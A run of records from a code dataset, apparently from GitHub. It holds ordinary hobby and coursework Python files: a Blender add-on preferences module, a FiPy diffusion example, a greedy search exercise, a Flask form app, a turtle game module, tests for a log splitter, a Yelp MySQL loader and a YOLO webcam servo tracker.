import VGU_UI_Panel \n\n panel_cls = VGU_UI_Panel.VGU_PT_Vertex_Group_List_DATA\n category = addon_preferences.Vertex_Group_List_Category\n label = addon_preferences.Vertex_Group_List_Label\n\n item = [panel_cls, category, label]\n panels.append(item)\n\n\n panel_cls = VGU_UI_Panel.VGU_PT_Vertex_Group_List_SIDE\n category = addon_preferences.Vertex_Group_List_Category\n label = addon_preferences.Vertex_Group_List_Label\n\n item = [panel_cls, category, label]\n panels.append(item)\n\n\n panel_cls = VGU_UI_Panel.VGU_PT_Vertex_Group_Tools\n category = addon_preferences.Vertex_Group_Tools_Category\n label = addon_preferences.Vertex_Group_Tools_Label\n\n item = [panel_cls, category, label]\n panels.append(item)\n\n\n\n\n try:\n pass\n for item in panels:\n\n panel = item[0]\n category = item[1]\n label = item[2]\n \n if \"bl_rna\" in panel.__dict__:\n bpy.utils.unregister_class(panel)\n\n\n panel.bl_category = category\n panel.bl_label = label\n bpy.utils.register_class(panel)\n\n except Exception as e:\n print(\"\\n[{}]\\n{}\\n\\nError:\\n{}\".format(__name__, message, e))\n pass\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclass VGU_user_preferences(bpy.types.AddonPreferences):\n bl_idname = __package__\n\n\n TABS_Preferences: bpy.props.EnumProperty(items=ENUM_Tabs)\n\n\n Side_Panel: bpy.props.BoolProperty(default=True)\n Object_Data_Panel: bpy.props.BoolProperty(default=True)\n\n SoloIcon : bpy.props.BoolProperty(default=True)\n VisibilityIcon : bpy.props.BoolProperty(default=True)\n SelectionIcon : bpy.props.BoolProperty(default=True)\n SeperateIcon : bpy.props.BoolProperty(default=True)\n AssignIcon : bpy.props.BoolProperty(default=True)\n UnassignIcon : bpy.props.BoolProperty(default=True)\n RemoveIcon : bpy.props.BoolProperty(default=True)\n AddModifierIcon : bpy.props.BoolProperty(default=False)\n LockWeightIcon : bpy.props.BoolProperty(default=False)\n SetPivotIcon : bpy.props.BoolProperty(default=False)\n LockAllButThis: bpy.props.BoolProperty(default=False)\n\n Icon_Expose_Style : bpy.props.EnumProperty(items=Icon_Expose_Style, default=\"PANEL\")\n Show_Icon_Expose_Panel : bpy.props.BoolProperty(default=False)\n\n \n Vertex_Group_List_Category: bpy.props.StringProperty(default=\"Vertex Group Utils\", update=update_panel)\n Vertex_Group_List_Label: bpy.props.StringProperty(default=\"Vertex Group List\", update=update_panel)\n\n Vertex_Group_Tools_Category: bpy.props.StringProperty(default=\"Vertex Group Utils\", update=update_panel)\n Vertex_Group_Tools_Label: bpy.props.StringProperty(default=\"Vertex Group Tools\", update=update_panel)\n\n\n Vertex_Group_List_Side_Panel: bpy.props.BoolProperty(default=True)\n Vertex_Group_List_Data_Panel: bpy.props.BoolProperty(default=True)\n Vertex_Group_Tools: bpy.props.BoolProperty(default=True)\n\n\n\n def draw(self, context):\n\n\n\n layout = self.layout\n\n col = layout.column(align=True)\n row = col.row(align=True)\n row.prop(self, \"TABS_Preferences\", expand=True)\n\n box = col.box()\n\n if self.TABS_Preferences == \"PANELS\":\n self.draw_panel_options(context, box)\n\n if self.TABS_Preferences == \"KEYMAPS\":\n self.draw_keymaps(context, box)\n\n def draw_panel_options(self, context, layout):\n\n\n # layout.prop(self, \"Side_Panel\", text=\"Display Side Panel\")\n # layout.prop(self, \"Object_Data_Panel\", text=\"Display Object Data Panel\")\n\n layout.label(text=\"Vertex Group List\")\n row = layout.row()\n row.prop(self, \"Vertex_Group_List_Side_Panel\", text=\"Side Panel\")\n row.prop(self, \"Vertex_Group_List_Data_Panel\", 
text=\"Object Data Properties Panel\")\n\n if any([self.Vertex_Group_List_Side_Panel, self.Vertex_Group_List_Data_Panel]):\n\n layout.prop(self, \"Vertex_Group_List_Category\", text=\"Category\")\n layout.prop(self, \"Vertex_Group_List_Label\", text=\"Label\")\n\n\n\n\n layout.label(text=\"Vertex Group Tools\")\n layout.prop(self, \"Vertex_Group_Tools\", text=\"Side Panel\")\n if self.Vertex_Group_Tools:\n layout.prop(self, \"Vertex_Group_Tools_Category\", text=\"Category\")\n layout.prop(self, \"Vertex_Group_Tools_Label\", text=\"Label\")\n\n layout.separator()\n\n def draw_keymaps(self, context, layout):\n\n wm = bpy.context.window_manager\n box = layout\n\n split = box.split()\n col = split.column()\n col.label(text=\"Vertex Group Utils Hotkey\")\n col.separator()\n\n\n # keymap = context.window_manager.keyconfigs.user.keymaps['3D View']\n # keymap_items = keymap.keymap_items\n # km = keymap.active()\n\n\n\n wm = bpy.context.window_manager\n kc = wm.keyconfigs.user\n\n km = kc.keymaps['3D View']\n kmi = km.keymap_items[\"vgu.call_pie\"]\n\n # kmi = keymap_items[\"vgu.call_pie\"]\n # kmi.show_expanded = False\n # rna_keymap_ui.draw_kmi(kmi, keymap, km, kmi, col, 0)\n # col.separator(factor=0.5)\n\n\n if kmi:\n col.context_pointer_set(\"keymap\", km)\n rna_keymap_ui.draw_kmi([], kc, km, kmi, col, 0)\n else:\n col.operator(Template_Add_Hotkey.bl_idname, text = \"Add hotkey entry\")\n\n\n\n\naddon_keymaps = []\n\n\n\ndef get_addon_preferences():\n ''' quick wrapper for referencing addon preferences '''\n # addon_preferences = bpy.context.user_preferences.addons[__name__].preferences\n addon_preferences = utility_function.get_addon_preferences(bpy.context)\n\n return addon_preferences\n\n\ndef get_hotkey_entry_item(km, kmi_name, kmi_value):\n '''\n returns hotkey of specific type, with specific properties.name (keymap is not a dict, so referencing by keys is not enough\n if there are multiple hotkeys!)\n '''\n for i, km_item in enumerate(km.keymap_items):\n if km.keymap_items.keys()[i] == kmi_name:\n if km.keymap_items[i].properties.name == kmi_value:\n return km_item\n return None\n\n\n\ndef add_hotkey():\n user_preferences = bpy.context.preferences\n\n addon_prefs = utility_function.get_addon_preferences(bpy.context)\n # addon_prefs = user_preferences.addons[\"Vertex Group Utils\"].preferences\n\n wm = bpy.context.window_manager\n kc = wm.keyconfigs.addon\n km = kc.keymaps.new(name=\"3D View\", space_type='VIEW_3D', region_type='WINDOW')\n kmi = km.keymap_items.new(\"vgu.call_pie\", type=\"V\", value=\"PRESS\", shift=True, alt=True)\n # kmi.active = True\n addon_keymaps.append((km, kmi))\n\n\nclass Template_Add_Hotkey(bpy.types.Operator):\n ''' Add hotkey entry '''\n bl_idname = \"template.add_hotkey\"\n bl_label = \"Addon Preferences Example\"\n bl_options = {'REGISTER', 'INTERNAL'}\n\n def execute(self, context):\n add_hotkey()\n # self.report({'INFO'}, \"Hotkey added in User Preferences -> Input -> Screen -> Screen (Global)\")\n return {'FINISHED'}\n\ndef remove_hotkey():\n ''' clears all addon level keymap hotkeys stored in addon_keymaps '''\n wm = bpy.context.window_manager\n kc = wm.keyconfigs.addon\n km = kc.keymaps['3D View']\n\n\n\n for km, kmi in addon_keymaps:\n km.keymap_items.remove(kmi)\n wm.keyconfigs.addon.keymaps.remove(km)\n addon_keymaps.clear()\n\n\n\nclasses = [VGU_user_preferences, Template_Add_Hotkey]\n\ndef register():\n\n add_hotkey()\n\n\n\n for cls in classes:\n bpy.utils.register_class(cls)\n\n\n update_panel(None, bpy.context)\n\n\n # 
bpy.types.Scene.BoolBasedVisibility = bpy.props.BoolProperty(default=False)\n\n\n\n\n\n\ndef unregister():\n\n    remove_hotkey()\n\n    update_panel(None, bpy.context)\n\n    for cls in classes:\n        bpy.utils.unregister_class(cls)\n\n    # del bpy.types.Scene.BoolBasedVisibility\n\n\n\nif __name__ == \"__main__\":\n    register()\n","repo_name":"BlenderBoi/Vertex_Group_Utils","sub_path":"VGU_Preferences.py","file_name":"VGU_Preferences.py","file_ext":"py","file_size_in_byte":8430,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"84"} +{"seq_id":"35126692015","text":"\r\ncellSize = 0.05\r\nradius = 1.\r\n\r\nfrom fipy import CellVariable, Gmsh2D, TransientTerm, DiffusionTerm, Viewer\r\nfrom fipy.tools import numerix\r\n\r\nmesh = Gmsh2D('''\r\n               cellSize = %(cellSize)g;\r\n               radius = %(radius)g;\r\n               Point(1) = {0, 0, 0, cellSize};\r\n               Point(2) = {-radius, 0, 0, cellSize};\r\n               Point(3) = {0, radius, 0, cellSize};\r\n               Point(4) = {radius, 0, 0, cellSize};\r\n               Point(5) = {0, -radius, 0, cellSize};\r\n               Circle(6) = {2, 1, 3};\r\n               Circle(7) = {3, 1, 4};\r\n               Circle(8) = {4, 1, 5};\r\n               Circle(9) = {5, 1, 2};\r\n               Line Loop(10) = {6, 7, 8, 9};\r\n               Plane Surface(11) = {10};\r\n               ''' % locals())\r\n\r\nphi = CellVariable(name = \"solution variable\",\r\n                   mesh = mesh,\r\n                   value = 0.)\r\n\r\nviewer = None\r\nfrom fipy import input\r\nif __name__ == '__main__':\r\n    try:\r\n        viewer = Viewer(vars=phi, datamin=-1, datamax=1.)\r\n        viewer.plotMesh()\r\n        input(\"Irregular circular mesh. Press <return> to proceed...\")\r\n    except:\r\n        print(\"Unable to create a viewer for an irregular mesh (try Matplotlib2DViewer or MayaviViewer)\")\r\n\r\nD = 1.\r\neq = TransientTerm() == DiffusionTerm(coeff=D)\r\n\r\nX, Y = mesh.faceCenters\r\nphi.constrain(X, mesh.exteriorFaces)\r\n\r\ntimeStepDuration = 10 * 0.9 * cellSize**2 / (2 * D)\r\nsteps = 10\r\nfrom builtins import range\r\nfor step in range(steps):\r\n    eq.solve(var=phi,\r\n             dt=timeStepDuration)\r\n    if viewer is not None:\r\n        viewer.plot()\r\n\r\n\r\n\r\n","repo_name":"Jasmine969/cfd_study","sub_path":"draft2.py","file_name":"draft2.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"12699887718","text":"import queue as q\nclass greedysearch:\n    def search(self,d,start,goal):\n        que=q.PriorityQueue()\n        que.put((start.h,start))\n        path=list()\n        while(not que.empty()):\n            node=que.get()\n            node=node[1]\n            path.append(node)\n            que=q.PriorityQueue()\n            if node.name==goal.name:\n                return path\n            else:\n                for child in d[node]:\n                    if child not in path:\n                        que.put((child.h,child))\n        return [\"error\"]\nclass node:\n    def __init__(self,name,h):\n        self.name=name\n        self.h=h\ns=node('s',7)\na=node('a',6)\nb=node('b',5)\nc=node('c',4)\nd=node('d',2)\ng=node('g',0)\n\nd={s:[a,b],a:[s,g],b:[s,c],c:[b,d],d:[g,c],g:[a,d]}\nobj=greedysearch()\nprint([x.name for x in obj.search(d,s,g)])\n","repo_name":"Momerhussain/Artificial-Intelligence-Practice-Labs","sub_path":"greedy.py","file_name":"greedy.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"72973619795","text":"from flask import Flask, render_template, request, redirect, url_for\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef show_entry_student_scores():\n    return 
render_template(\"entry_student_scores.html\")\n\n@app.route(\"/result\", methods=[\"GET\", \"POST\"])\ndef show_results():\n if request.method == \"POST\":\n res = request.form\n return render_template(\"exam_results.html\", results=res)\n else:\n return redirect(url_for(\"show_entry_student_scores\"))\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n\n","repo_name":"f-fathurrahman/KuliahPython","sub_path":"flask/test_sending_form_data_v1.py","file_name":"test_sending_form_data_v1.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"2425080247","text":"from turtle import Turtle\nimport random\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nSTARTING_MOVE_DISTANCE = 5\nMOVE_INCREMENT = 10\n\n\nclass CarManager:\n def __init__(self):\n self.cars = []\n self.car_speed = STARTING_MOVE_DISTANCE\n\n def move(self):\n for car in self.cars:\n new_x = car.xcor() - self.car_speed\n new_y = car.ycor()\n car.goto(new_x, new_y)\n\n def create_car(self):\n create_chance = random.randint(1, 6)\n if create_chance == 1:\n new_car = Turtle(\"square\")\n new_car.penup()\n new_car.shapesize(stretch_wid=1, stretch_len=2)\n new_car.color(random.choice(COLORS))\n new_car.goto(250, random.randrange(-250, 250))\n self.cars.append(new_car)\n\n def movement_continue(self):\n self.car_speed += MOVE_INCREMENT\n","repo_name":"Chuks-Chuks/turtle-crossing-start","sub_path":"car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"23353019401","text":"n=int(input(\"Enter the number of co-ordinates : \"))\r\nli=[]\r\nfor i in range(n):\r\n x,y=map(int,(input(\"Enter the co_ordinates in x,y format: \").split(',')))\r\n li.append((x,y))\r\ncheck_x_negative=sorted(li)\r\ncheck_y_negative=sorted(li, key=lambda x:x[1])\r\nif check_x_negative[0][0]<=0 or check_y_negative[0][1]<=0:\r\n li2 = []\r\n for i in li:\r\n new = []\r\n for j in i:\r\n if j == 0 or j < 0 or j > 0:\r\n j = j + 8\r\n new.append(j)\r\n li2.append(tuple(new))\r\n print(\"The set of positive co_ordinates \")\r\n print(li2)\r\n\r\nelse:\r\n print(\"All Co-ordinates are positive\")\r\n","repo_name":"Shegde495/Assignment-8","sub_path":"Assignment 8.4.py","file_name":"Assignment 8.4.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"22622684243","text":"import numpy as np\nimport matplotlib.pyplot as plt\nr = 5\ncoeff = [1,-4,-12]\nA = np.roots(coeff)\nO = np.array((A[0],0))\nO1 = np.array((A[1],0))\ndef circ_gen(O,r):\n len = 50\n theta = np.linspace(0,2*np.pi,len)\n xc = np.zeros((2,len))\n xc[0,:] = r*np.cos(theta)\n xc[1,:] = r*np.sin(theta)\n xc = (xc.T + O).T\n return xc\nxc = circ_gen(O,5)\nxc1 = circ_gen(O1,5)\nplt.plot(xc[0,:],xc[1,:])\nplt.plot(xc1[0,:],xc1[1,:])\nplt.xlabel('$x$')\nplt.ylabel('$y$')\nplt.grid() # minor\nplt.axis('equal')\nplt.savefig('/sdcard/Download/Matrices/conic/conic.png')\n#plt.show()\n","repo_name":"gadepall/matrix-analysis","sub_path":"bkup/chapters/11/11/1/12/codes/conic.py","file_name":"conic.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"11029354523","text":"import pytest\nfrom helpers import *\nfrom itertools import zip_longest\n\n\nclass 
TestLogDistribution:\n\n @pytest.mark.parametrize(\"file_name\", [\n \"events_target_1.log\",\n \"events_target_2.log\"\n ])\n def test_verify_file_exist(self, file_name: str):\n \"\"\"\n Test verifies that output event log file exist after input data was split\n :param file_name: string that contains name of the events log file\n \"\"\"\n file_path = f\"{os.getcwd()}/outputs\"\n\n # verify that file exists\n assert os.path.isfile(f\"{file_path}/{file_name}\"), (\n f\"File {file_name} is not found\"\n )\n\n @pytest.mark.parametrize(\"file_names\", [\n {\n \"input\": \"large_1M_events.log\",\n \"target_1\": \"events_target_1.log\",\n \"target_2\": \"events_target_2.log\"\n }\n ])\n def test_verify_output_files_size_match_input_file(self, file_names: dict):\n \"\"\"\n Test verifies that size of two combined events log files matches size of input log file.\n :param file_names: dict with file names\n \"\"\"\n # Get file size in bytes\n main_file = os.stat(f\"{os.getcwd()}/agent/inputs/{file_names.get('input')}\").st_size\n events_one = os.stat(f\"{os.getcwd()}/outputs/{file_names.get('target_1')}\").st_size\n events_two = os.stat(f\"{os.getcwd()}/outputs/{file_names.get('target_2')}\").st_size\n\n # Verify that input log file size matches size of combined output log files\n combined_size = sum([events_one, events_two])\n assert main_file == combined_size, (\n f\"Input file size doesn't match combined output files size\"\n f\"\\nExpected input file size: {main_file} bytes\"\n f\"\\nActual combined file size: {combined_size} bytes\"\n f\"\\nWhere file size in bytes for target_1: {events_one} and target_2: {events_two}\"\n f\"\\nTest input data:\\n{file_names}\"\n )\n\n @pytest.mark.parametrize(\"file_names\", [\n {\n \"input\": \"large_1M_events.log\",\n \"target_1\": \"events_target_1.log\",\n \"target_2\": \"events_target_2.log\"\n }\n ])\n def test_verify_combined_number_lines_match_input(self, file_names: dict):\n \"\"\"\n Test verifies that total combined count of lines in both output event log files matches number\n of lines in the input log file\n :param file_names: dict with file names\n \"\"\"\n # Path to input log file and output events log files\n input_path = f\"{os.getcwd()}/agent/inputs/{file_names.get('input')}\"\n events_one_path = f\"{os.getcwd()}/outputs/{file_names.get('target_1')}\"\n events_two_path = f\"{os.getcwd()}/outputs/{file_names.get('target_2')}\"\n\n # Open log files in 'read' mode (opened files would be automatically closed after the test)\n with open(input_path, \"r\") as input_file, open(events_one_path, \"r\") as events_one, open(events_two_path, \"r\") as events_two:\n input_lines_count, events_one_count, events_two_count = 0, 0, 0\n # Iterate through all files line by line\n for line, line_one, line_two in zip_longest(input_file, events_one, events_two):\n # Increment counts when line from file exist\n if line:\n input_lines_count += 1\n if line_one:\n events_one_count += 1\n if line_two:\n events_two_count += 1\n\n # Verify that number of lines matches\n sum_lines = sum([events_one_count, events_two_count])\n assert input_lines_count == sum_lines, (\n f\"Number of lines in input file doesn't match combined number of lines\"\n f\"\\nExpected number of lines: {input_lines_count}\"\n f\"\\nActual number of lines: {sum_lines}\"\n f\"\\nWhere number of lines for target_1 file: {events_one_count} and target_2 file: {events_two_count}\"\n f\"\\nTest input data: {file_names}\"\n )\n\n @pytest.mark.ddev\n @pytest.mark.parametrize(\"file_names\", [\n {\n \"input\": 
\"large_1M_events.log\",\n            \"target_1\": \"events_target_1.log\",\n            \"target_2\": \"events_target_2.log\"\n        }\n    ])\n    def test_verify_file_content_matches(self, file_names: dict):\n        # Path to input log file and output events log files\n        input_path = f\"{os.getcwd()}/agent/inputs/{file_names.get('input')}\"\n        events_one_path = f\"{os.getcwd()}/outputs/{file_names.get('target_1')}\"\n        events_two_path = f\"{os.getcwd()}/outputs/{file_names.get('target_2')}\"\n\n        # combine two output log files into one sorted file\n        combined_file_path = combine_files(events_one_path, events_two_path)\n        # sort_file(combined_file_path)\n\n        with open(input_path, 'r') as input_file, open(combined_file_path, 'r') as sorted_results:\n            # read data from files\n            input_list = input_file.readlines()\n            out_list = sorted_results.readlines()\n\n        # compare two sets with data from files\n        set_difference = set(out_list) - set(input_list)\n        corrupted_data = list(set_difference)\n\n        # map line of data to a host\n        # in case any data was corrupted during the splitter process\n        if len(corrupted_data) != 0:\n            mapped_to_file = []\n            for element in corrupted_data:\n                # we need to match line of data with file that it came from\n                for file in [events_one_path, events_two_path]:\n                    # call method that will return True if line matched the file\n                    file_found = get_file_name_from_string(element, file)\n                    if file_found:\n                        # translate file name to host name\n                        for file_name in file_names.keys():\n                            if file_name in file:\n                                host_name = file_name\n                        mapped_to_file.append((host_name, element))\n                        # exit loop if file was identified\n                        break\n\n        # verify that data was split without loss\n        assert len(corrupted_data) == 0, (\n            f\"Total of {len(corrupted_data)} event(s) were corrupted after data went through Splitter\\n\"\n            f\"\\nFollowing list of pairs (receiving_host_name, log_line) were corrupted:\\n\"\n            f\"{mapped_to_file}\\n\"\n        )\n","repo_name":"Dkhazhinov/cribl","sub_path":"test/test_events_log_data_distribution.py","file_name":"test_events_log_data_distribution.py","file_ext":"py","file_size_in_byte":6533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"19698987804","text":"import cv2\r\nimport numpy as np\r\nimport serial\r\nimport time\r\n\r\nser = serial.Serial('COM3', baudrate=115200, timeout=1)\r\ntime.sleep(0.5)\r\npanPos = 75\r\ntiltPos = 80\r\nconfThreshold = 0.4\r\ncam = cv2.VideoCapture(1, cv2.CAP_DSHOW)\r\n\r\nclassesFile = 'coco80.names'\r\nclasses = []\r\nwith open(classesFile, 'r') as f:\r\n    classes = f.read().splitlines()\r\n\r\nnet = cv2.dnn.readNetFromDarknet('yolov3-320.cfg', 'yolov3-320.weights')\r\nnet.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)\r\nnet.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)\r\n\r\nwhile True:\r\n    ret, img = cam.read()\r\n    height, width, ch = img.shape\r\n    blob = cv2.dnn.blobFromImage(img, 1 / 255, (320, 320), (0, 0, 0), swapRB=True, crop=False)\r\n    net.setInput(blob)\r\n\r\n    layerNames = net.getLayerNames()\r\n    output_layers_names = net.getUnconnectedOutLayersNames()\r\n    LayerOutputs = net.forward(output_layers_names)\r\n\r\n    bboxes = []\r\n    confidences = []\r\n    class_ids = []\r\n\r\n    for output in LayerOutputs:\r\n        for i, detection in enumerate(output):\r\n            scores = detection[5:]\r\n            class_id = classes.index('cell phone')\r\n            confidence = scores[class_id]\r\n            if confidence > confThreshold:\r\n                center_x = int(detection[0]*width)\r\n                center_y = int(detection[1]*height)\r\n                w = int(detection[2]*width)\r\n                h = int(detection[3]*height)\r\n                x = 
int(center_x - w/2)\r\n                y = int(center_y - h/2)\r\n                bboxes.append([x, y, w, h])\r\n                confidences.append(float(confidence))\r\n                class_ids.append(class_id)\r\n\r\n    indexes = cv2.dnn.NMSBoxes(bboxes, confidences, confThreshold, 0.4)\r\n\r\n    font = cv2.FONT_HERSHEY_PLAIN\r\n    colors = np.random.uniform(0, 255, size=(len(bboxes), 3))\r\n\r\n    if len(indexes) > 0:\r\n        for i, bbox in enumerate(bboxes):\r\n            if i in indexes:\r\n                x, y, w, h = bbox\r\n                label = str(classes[class_ids[i]])\r\n                confidence = str(round(confidences[i], 2))\r\n                color = colors[i]\r\n                cv2.rectangle(img, (x, y), (x+w, y+h), color, 2)\r\n                cv2.putText(img, label+\" \"+confidence, (x, y+20), font, 2, (255, 255, 255), 2)\r\n\r\n                errorPan = (x + w / 2) - 640 / 2\r\n                errorTilt = (y + h / 2) - 480 / 2\r\n                print('errorPan', errorPan)\r\n                print('errorTilt', errorTilt)\r\n\r\n                if abs(errorPan) > 20:\r\n                    panPos = panPos - errorPan / 30\r\n                    print('panPos =', panPos)\r\n                if abs(errorTilt) > 20:\r\n                    tiltPos = tiltPos + errorTilt / 30\r\n                    print('tiltPos =', tiltPos)\r\n\r\n                if panPos > 150:\r\n                    panPos = 150\r\n                    print(\"panPos Out of range\")\r\n                if panPos < 10:\r\n                    panPos = 10\r\n                    print(\"panPos out of range\")\r\n                if tiltPos > 150:\r\n                    tiltPos = 150\r\n                    print(\"tiltPos Out of range\")\r\n                if tiltPos < 10:\r\n                    tiltPos = 10\r\n                    print(\"tiltPos out of range\")\r\n\r\n                panServoPos = str(int(panPos)) + '\\r'\r\n                tiltServoPos = str(int(tiltPos)) + '\\r'\r\n                ser.write((panServoPos + tiltServoPos).encode('utf-8'))\r\n                time.sleep(0.1)\r\n                print('panServoPos = ', panServoPos)\r\n                print('tiltServoPos = ', tiltServoPos)\r\n\r\n    cv2.imshow('MBS3523 Webcam', img)\r\n    if cv2.waitKey(1) & 0xff == 27:\r\n        break\r\n\r\ncam.release()\r\ncv2.destroyAllWindows()","repo_name":"Bearip/MBS3523-AI-and-Programming","sub_path":"MBS3523-Asn2-Q2.py","file_name":"MBS3523-Asn2-Q2.py","file_ext":"py","file_size_in_byte":3658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"41269801897","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nfrom noiseestimation.sensor import LinearSensor\n\ndt = 0.1\nF = np.array([[1, dt, 0, 0],\n              [0, 1, 0, 0],\n              [0, 0, 1, dt],\n              [0, 0, 0, 1]])\nH = np.array([[1, 0, 0, 0],\n              [0, 0, 1, 0]])\nx0 = np.array([[0],\n               [0.5],\n               [0],\n               [1]])\nsim = LinearSensor(x0, F, H)\n\nmeasurement_vars = np.linspace(0, 1, 500)\nRs = [np.eye(2) * measurement_var for measurement_var in measurement_vars]\nreadings = []\nfor R in Rs:\n    sim.step()\n    reading = sim.read(R)\n    readings.append(reading)\nreadings = np.asarray(readings)\n\nplt.plot(\n    readings[:, 0],\n    readings[:, 1],\n    'go', label=\"Measurements\")\nplt.show()\n","repo_name":"Kinodim/noiseestimation","sub_path":"evaluation/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"28764998120","text":"from random import *\nimport os\n\nx1 = randint(1, 28)\ncount = 1\nname = str(input(\"Enter your nickname: \"))\nwar = \"Opponent\"\nsize = 2021\nmassage = [\"Your move\", \"Go ahead\"]\nbrat = int(input(\"how many will you take each time: \"))\n\nx = randint(1, 2)\nif x == 1:\n    print(f'{name} WON')\nif x == 2:\n    print(f'{war} WON')\nprint(f\"The bot took {x1} each time\")","repo_name":"Ruzhikov-Sasha-Maksimovich/HomeWork_06","sub_path":"Second.py","file_name":"Second.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
+{"seq_id":"36917825830","text":"import json\nimport pandas as pd\nimport pymysql\n\nfrom config import FILE_DIR\nfrom utils.database import pymysql_connect\nfrom utils.timer import Timer\n\n\n# 원본 데이터 파일을 원하는 파일형식으로 바꾸는 함수(json or csv)\ndef make_ouput_file(to_type, file):\n file_type = file.split('/')[2].split('.')\n output_file = \"../yelp-dataset/{}.output\".format(file_type)\n data = [json.loads(line) for line in open(file, encoding='utf8')]\n df = pd.DataFrame(data)\n if to_type == 'json':\n df.to_json(output_file, orient='records', indent=False)\n if to_type == 'csv':\n df.to_csv(output_file, mode='w', index=False)\n return output_file\n\n# 바뀐 파일을 입력받아 line by line 처리, chunk_size 만큼 list 에 넣고 pymysql connector 를 사용하여 데이터 적재\n# ex) {\"business_id\":\"--U98MNlDym2cLn36BBPgQ\",\"date\":\"2011-10-05 22:50:41, 2012-04-11 00:06:36, 2012-07-17 23:55:20\"}\n# 'date' 컬럼을 ',' 로 split 하여 row 로 입력(위 데이터 입력시 DB에는 3개의 row 로 적재)\ndef insert_checkin_mysql(json_file, chunk_size):\n with open(json_file, encoding='utf-8') as json_file:\n json_data = json.load(json_file)\n\n checkin_insert_list = []\n\n cnx = pymysql_connect('mysql')\n cur = cnx.cursor(pymysql.cursors.DictCursor)\n for line in json_data:\n for date in line['date'].split(','):\n datetime = date.strip()\n checkin_data_dict = dict(\n business_id=line['business_id'],\n date=datetime\n )\n checkin_insert_list.append(checkin_data_dict)\n\n if len(checkin_insert_list) > chunk_size:\n insert_chekin_sql = \"\"\"INSERT INTO checkin (`business_id`, `date`) VALUES (%(business_id)s, %(date)s)\"\"\"\n time.start('insert {} lines'.format(len(checkin_insert_list)))\n cur.executemany(insert_chekin_sql, checkin_insert_list)\n cnx.commit()\n time.stop()\n checkin_insert_list = []\n\n else:\n pass\n cur.close()\n cnx.close()\n\n\nif __name__ == \"__main__\":\n\n time = Timer()\n json_file = FILE_DIR['checkin']['file_dir']\n output_file = FILE_DIR['checkin']['ouput_file_dir']\n\n print(\"file : \", json_file)\n print(\"output_file : \", output_file)\n\n time.start('make json file')\n make_ouput_file(json_file, output_file)\n time.stop()\n\n chunk_size = 100000\n insert_checkin_mysql(output_file, chunk_size)\n\n","repo_name":"yongdol86/yelp","sub_path":"insert/checkin.py","file_name":"checkin.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"70409849556","text":"#!/usr/bin/env python3\n\n\"\"\"\nMain\nRuns trade agent with passed parameters\n\"\"\"\nfrom dotenv import load_dotenv\n\nfrom tradeagent import TradeAgent\n\nclass textformat:\n PURPLE = '\\033[95m'\n CYAN = '\\033[96m'\n DARKCYAN = '\\033[36m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n END = '\\033[0m'\n\ndef main():\n ta = TradeAgent()\n ta.run()\n\nif __name__ == \"__main__\":\n load_dotenv()\n\n print(\n f\"{textformat.GREEN}%%-------------------------------------------%%{textformat.END}\",\n f\"\\n{textformat.GREEN}%%----------%% TRADER AGENT v0.1 %%----------%%{textformat.END}\",\n f\"\\n{textformat.GREEN}%%-------------------------------------------%%{textformat.END}\",\n )\n\n main()","repo_name":"shamantechnology/tradeagent","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"39632364088","text":"#!/usr/bin/env python3\r\n\r\n## written by Mariam Nawaz\r\n## 
